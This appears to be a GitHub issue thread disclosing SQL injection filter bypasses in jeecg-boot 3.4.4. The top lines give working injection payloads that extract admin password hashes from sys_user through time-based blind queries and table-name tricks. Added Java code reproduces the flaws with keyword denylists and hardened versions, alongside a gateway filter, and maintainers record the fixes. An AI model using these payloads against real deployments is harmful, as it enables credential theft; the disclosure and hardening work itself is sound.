In the SqlInjectionUtil class, the regex for SQL comments is
private final static Pattern SQL_ANNOTATION = Pattern.compile("/\\*.*\\*/");
`.` cannot match %0A, so the check can be bypassed with /*%0A*/.
The keywords in the keyword check are followed by a space, which allows a bypass:
private final static String XSS_STR = "and |extractvalue|updatexml|exec |insert |select |delete |update |drop |count |chr |mid |master |truncate |char |declare |;|or |+|user()";
The blacklist in the AbstractQueryBlackListHandler class:
ruleMap.put("sys_user", "password,salt");
In the isPass function, ruleMap.get(name) returning null is enough to bypass it; sys_user, (sys_user), sys_user%20 and similar variants work.
There are several injection points:
dataId=2000&fieldName=(select(if(((select/*%0A*/password/*%0A*/from/*%0A*/sys_user/*%0A*/where/*%0A*/username/*%0A*/='jeecg')='eee378a1258530cb'),sleep(4),1)))&fieldVal=1000&tableName=sys_log
?dictCode=sys_user%20,username,password
?table=%60sys_user%60&pageSize=22&pageNo=1&text=username&code=password
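The following Java is an added illustration and not jeecg-boot's own SqlInjectionUtil or AbstractQueryBlackListHandler code; only the comment regex and the sys_user rule quoted in the report are taken from the project, and the class, method names and the hardened variants are assumptions. It reproduces the three bypasses described above (a `.` that does not match a newline, a keyword list that relies on a trailing space, and an exact-key blacklist lookup) next to one way to close each, and runs the reported payload and table-name variants through both versions.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Locale;
import java.util.Map;
import java.util.Set;
import java.util.regex.Pattern;

// Added illustration, not jeecg-boot's code. Only the comment regex and the
// sys_user -> password,salt rule are taken from the report; everything else is assumed.
// Needs Java 11+ (URLDecoder.decode(String, Charset), Map.of, Set.of).
public class SqlFilterBypassDemo {

    // As reported: without DOTALL, '.' does not match '\n', so "/*\n*/" is never stripped
    // and later acts as whitespace for MySQL once the value reaches the query.
    static final Pattern WEAK_COMMENT = Pattern.compile("/\\*.*\\*/");

    // Hardened: DOTALL lets '.' cross line terminators; the reluctant '*?' stops one
    // match from swallowing everything between two separate comments.
    static final Pattern STRONG_COMMENT = Pattern.compile("/\\*.*?\\*/", Pattern.DOTALL);

    // Trailing-space keywords in the style of the quoted XSS_STR: "select " cannot match
    // "select/*\n*/password" because the comment stands where the space would be.
    static final String[] KEYWORDS_WITH_SPACE = {"and ", "or ", "select ", "delete ", "update ", "drop "};

    // Hardened: word boundaries instead of a literal trailing space.
    static final Pattern KEYWORD_RE = Pattern.compile(
            "\\b(and|or|select|delete|update|drop|sleep|extractvalue|updatexml)\\b",
            Pattern.CASE_INSENSITIVE);

    // Column blacklist keyed by table name, as in the report.
    static final Map<String, Set<String>> RULES = Map.of("sys_user", Set.of("password", "salt"));

    /** Weak check: strip comments with the reported regex, then look for "keyword ". */
    static boolean weakDetects(String value) {
        String cleaned = WEAK_COMMENT.matcher(value).replaceAll("").toLowerCase(Locale.ROOT);
        return Arrays.stream(KEYWORDS_WITH_SPACE).anyMatch(cleaned::contains);
    }

    /** Hardened check: decode, drop comments (multi-line too), collapse whitespace, boundary match. */
    static boolean strongDetects(String value) {
        String decoded = URLDecoder.decode(value, StandardCharsets.UTF_8);
        String cleaned = STRONG_COMMENT.matcher(decoded).replaceAll(" ").replaceAll("\\s+", " ");
        return KEYWORD_RE.matcher(cleaned).find();
    }

    /** Weak lookup: exact key, so "(sys_user)", "sys_user " and "`sys_user`" all return null. */
    static boolean weakIsPass(String table, String column) {
        Set<String> blocked = RULES.get(table);
        return blocked == null || !blocked.contains(column);
    }

    /** Canonicalise the table name before the lookup: decode, trim, drop wrapping ( ) and ` `. */
    static String normaliseTable(String table) {
        String t = URLDecoder.decode(table, StandardCharsets.UTF_8).trim();
        t = t.replaceAll("^[(`\\s]+|[)`\\s]+$", "");
        return t.toLowerCase(Locale.ROOT);
    }

    /** Hardened lookup: every column named in the request is checked against the rule. */
    static boolean strongIsPass(String table, String columnList) {
        Set<String> blocked = RULES.get(normaliseTable(table));
        if (blocked == null) {
            return true;
        }
        for (String column : columnList.split(",")) {
            if (blocked.contains(column.trim().toLowerCase(Locale.ROOT))) {
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) {
        // The fieldName payload from the report; the compared hash is replaced by a constructed value.
        String payload = URLDecoder.decode(
                "(select(if(((select/*%0A*/password/*%0A*/from/*%0A*/sys_user/*%0A*/where/*%0A*/"
                        + "username/*%0A*/='jeecg')='x'),sleep(4),1)))", StandardCharsets.UTF_8);
        System.out.println("weak detects   : " + weakDetects(payload));
        System.out.println("strong detects : " + strongDetects(payload));

        // The table-name variants from the report, paired with the column list from the dictCode URL.
        for (String table : new String[] {"sys_user", "(sys_user)", "sys_user%20", "%60sys_user%60"}) {
            String raw = URLDecoder.decode(table, StandardCharsets.UTF_8);
            System.out.printf("%-18s weakIsPass=%-5b strongIsPass=%b%n", table,
                    weakIsPass(raw, "password"), strongIsPass(table, "username,password"));
        }
    }
}
```

With the weak versions the payload is not detected and every table-name variant except the bare `sys_user` passes the blacklist; with the hardened versions the payload is detected and all four variants are blocked. The hardened keyword check is still a denylist and will produce false positives on ordinary values (a field literally named "order", say), so the durable fix for endpoints like these is to accept table and column names only from an allowlist and bind user values as parameters rather than to keep patching the filter.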
The /*%0A*/, sys_user, (sys_user), sys_user%20 and %60sys_user%60 issues have been fixed.
/sys/api/getDictItems is an interface used for calls between microservices and has no signature verification. If you run the microservice edition, you can block calls to the /sys/api/ interfaces in the gateway filter.
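One way to apply the gateway-side block suggested above, as an added example that is not jeecg-boot's gateway code: it assumes the gateway is Spring Cloud Gateway and that the system service may sit behind a route prefix, so `/sys/api/` is matched anywhere after a slash rather than only at the start of the path.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.regex.Pattern;

import org.springframework.cloud.gateway.filter.GatewayFilterChain;
import org.springframework.cloud.gateway.filter.GlobalFilter;
import org.springframework.core.Ordered;
import org.springframework.http.HttpStatus;
import org.springframework.stereotype.Component;
import org.springframework.web.server.ServerWebExchange;
import reactor.core.publisher.Mono;

// Added example, not jeecg-boot's code. Assumes Spring Cloud Gateway; the class name and
// the route-prefix assumption are illustrative.
@Component
public class InternalApiBlockFilter implements GlobalFilter, Ordered {

    // Match "/sys/api/" at the start of the path or directly after a route prefix.
    private static final Pattern INTERNAL_API = Pattern.compile("(^|/)sys/api/");

    @Override
    public Mono<Void> filter(ServerWebExchange exchange, GatewayFilterChain chain) {
        String path;
        try {
            // normalize() resolves "/./" and "/../"; decoding catches "sys%2Fapi" spellings.
            // Over-matching here can only deny, so erring towards blocking is acceptable.
            path = URLDecoder.decode(
                    exchange.getRequest().getURI().normalize().getRawPath(), StandardCharsets.UTF_8);
        } catch (IllegalArgumentException malformedEscape) {
            // Fail closed: a path that cannot be decoded is not forwarded anywhere.
            return deny(exchange);
        }
        if (INTERNAL_API.matcher(path).find()) {
            return deny(exchange);
        }
        return chain.filter(exchange);
    }

    private static Mono<Void> deny(ServerWebExchange exchange) {
        exchange.getResponse().setStatusCode(HttpStatus.FORBIDDEN);
        return exchange.getResponse().setComplete();
    }

    @Override
    public int getOrder() {
        // Run ahead of routing and authentication filters so the request never reaches the service.
        return Ordered.HIGHEST_PRECEDENCE;
    }
}
```

This only removes the external path to the unsigned interface; services that are reachable on the network without going through the gateway can still call it, so the block is a containment measure, not a substitute for authenticating inter-service calls.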
Fixed.
Fix SQL injection vulnerability #4393
0fc374d
Fix SQL injection vulnerability jeecgboot#4393
4e4aaf4
Version: 3.4.4
Frontend version: vue2
Problem description: the SQL injection detection code can be bypassed.
The interface does not perform signature verification.